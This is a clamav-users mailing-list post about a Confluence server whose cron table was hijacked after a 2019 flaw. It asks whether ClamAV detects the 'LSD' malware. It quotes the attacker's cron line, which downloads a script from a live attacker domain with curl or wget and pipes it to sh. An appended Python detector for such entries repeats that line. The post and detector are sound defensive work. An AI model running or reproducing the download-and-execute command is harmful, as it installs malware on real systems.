Dear Friends,

We recently faced an Atlassian Confluence issue.
Atlassian issued a security advisory on 29/03/2019
<https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html>.
Following this thread
<https://community.atlassian.com/t5/Confluence-discussions/khugepageds-eating-all-of-the-CPU/td-p/1055337>,
we understood what happened on our server.
Confluence is running in its own user space and has seen its crontab
hacked.

On our Debian Stretch, 'crontab -u confluence -e' shows a non-legit
instruction:

*/10 * * * * (curl -fsSL https://dd.heheda.tk/i.jpg||wget -q -O- https://dd.heheda.tk/i.jpg)|sh


Obviously the security flaw in Confluence opened the gate to this behaviour.
As we are running Confluence in its own user space, the i.jpg, which contains
the shell script, didn't harm our server. No malware has been
deployed; however, the server was shutting down immediately after starting.

We cleaned up the crontab and upgraded Confluence to avoid any further
infection.

However, we need to check our installation and I'm wondering if ClamAV
already knows this malware family
<https://git.laucyun.com/security/lsd_malware_clean_tool/blob/master/README.md>.
I already opened a report to ClamAV. Is there any user who faced this issue,
and is ClamAV ready to detect and clean up our Linux boxes?

Any pointers to information about this LSD malware family will be
greatly appreciated, as I try to evaluate the risks for our infrastructure
(I checked various DBs with no success and googled too).

Warmly.

Light

Pudhuveedu / Xavier

PGP Fingerprint: CAE5 CE4A EFE9 134F D991 5465 081C B6FB 2EAC 6CC9
<http://keyserver.ubuntu.com/pks/lookup?op=get&search=0x081CB6FB2EAC6CC9>
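One way to sweep every user's crontab for the download-and-pipe-to-shell pattern quoted in the post, as an added example in Python that is not from the post, from Atlassian or from ClamAV. The Debian spool path is an assumption, and the sample crontab is constructed (its last line is the entry quoted above):

```python
import os
import re

# Fetch of a remote URL by curl or wget inside a single pipeline stage.
FETCH_RE = re.compile(r"\b(?:curl|wget)\b[^|;&]*?(https?://[^\s'\")|]+)", re.I)
# Pipeline stage that hands stdin to a shell interpreter.
PIPE_TO_SHELL_RE = re.compile(r"\|\s*(?:/bin/|/usr/bin/)?(?:sh|bash|dash|zsh|ksh)\b")

def split_cron_line(line):
    """(schedule, command) for an entry; None for blanks, comments, VAR=.. lines."""
    s = line.strip()
    if not s or s.startswith("#") or re.match(r"^[A-Za-z_]\w*\s*=", s):
        return None
    if s.startswith("@"):                       # @reboot, @daily, ...
        parts = s.split(None, 1)
        return (parts[0], parts[1]) if len(parts) == 2 else None
    parts = s.split(None, 5)                    # five time fields + command
    return (" ".join(parts[:5]), parts[5]) if len(parts) == 6 else None

def find_download_and_exec(lines):
    """Flag entries that fetch a URL and pipe the body straight into a shell."""
    hits = []
    for n, line in enumerate(lines, 1):
        parsed = split_cron_line(line)
        if parsed is None:
            continue
        schedule, command = parsed
        urls = FETCH_RE.findall(command)
        if urls and PIPE_TO_SHELL_RE.search(command):
            hits.append({"line": n, "schedule": schedule, "urls": sorted(set(urls))})
    return hits

def scan_spool(spool_dir="/var/spool/cron/crontabs"):
    """Check every per-user crontab in the spool (assumed Debian path; needs root)."""
    report = {}
    if not os.path.isdir(spool_dir):
        return report
    for user in sorted(os.listdir(spool_dir)):
        with open(os.path.join(spool_dir, user), errors="replace") as fh:
            hits = find_download_and_exec(fh.read().splitlines())
        if hits:
            report[user] = hits
    return report

# Constructed sample: three benign lines plus the entry quoted in the post.
SAMPLE_CRONTAB = [
    "MAILTO=root",
    "0 3 * * * /usr/bin/apt-get update -q",
    "*/5 * * * * curl -s https://example.invalid/health > /dev/null",
    "*/10 * * * * (curl -fsSL https://dd.heheda.tk/i.jpg||wget -q -O- https://dd.heheda.tk/i.jpg)|sh",
]
```

Only the last sample line is reported; a plain curl health check without a pipe into a shell is left alone, so the hits are worth reading by hand rather than deleting blindly.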
_______________________________________________

clamav-users mailing list
clamav-users@lists.clamav.net
https://lists.clamav.net/mailman/listinfo/clamav-users
